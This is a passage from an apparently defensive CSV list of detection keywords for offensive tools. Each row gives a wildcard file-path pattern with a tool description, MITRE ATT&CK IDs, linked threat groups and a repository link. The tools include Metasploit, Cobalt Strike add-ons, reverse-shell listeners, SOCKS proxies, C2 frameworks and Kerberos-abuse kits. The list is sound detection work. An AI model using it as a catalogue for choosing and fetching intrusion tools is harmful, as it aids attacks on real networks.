Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ROADtools/*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*/rockyou.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rockyou.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/rockyou.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt 
wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/RoguePotato.git*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*/RogueWinRMdll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/RogueWinRMexe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/root/.mozilla/firefox/*.Exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/root/output/ratchatPT*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/root/shellcode.c*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/root/shellcode.cpp*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/root/shellcode.exe*","offensive_tool_keyword","FourEye","AV 
Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/root/viper/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/root/viper/dist*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/rop_emporium*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation 
tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*/rottenpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcbomb.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rpc-grind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcrt.py *","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" +"*/rpivot.git*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*/rsa-vuln-roca.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rservices_from_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rsocx-*-linux-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsocx-*-windows-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsocx.git*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - 
TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsync-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Rubeus*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Rubeus/*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Rudrastra.git*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*/rulerforms.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/run/leet.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/run_as_psh.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin 
runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/RunasCs.zip*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/RunAsWinTcb.git*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/RunAsWinTcb.iml*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/runcalc.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rundll32.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/rundll32_js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. 
JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/RunOF/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/runshellcode.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/RuralBishop.git*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*/rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rustcat/releases/latest/download/*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*/RustHound.git*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*/rvrsh3ll/*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/RWXfinder.git*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - 
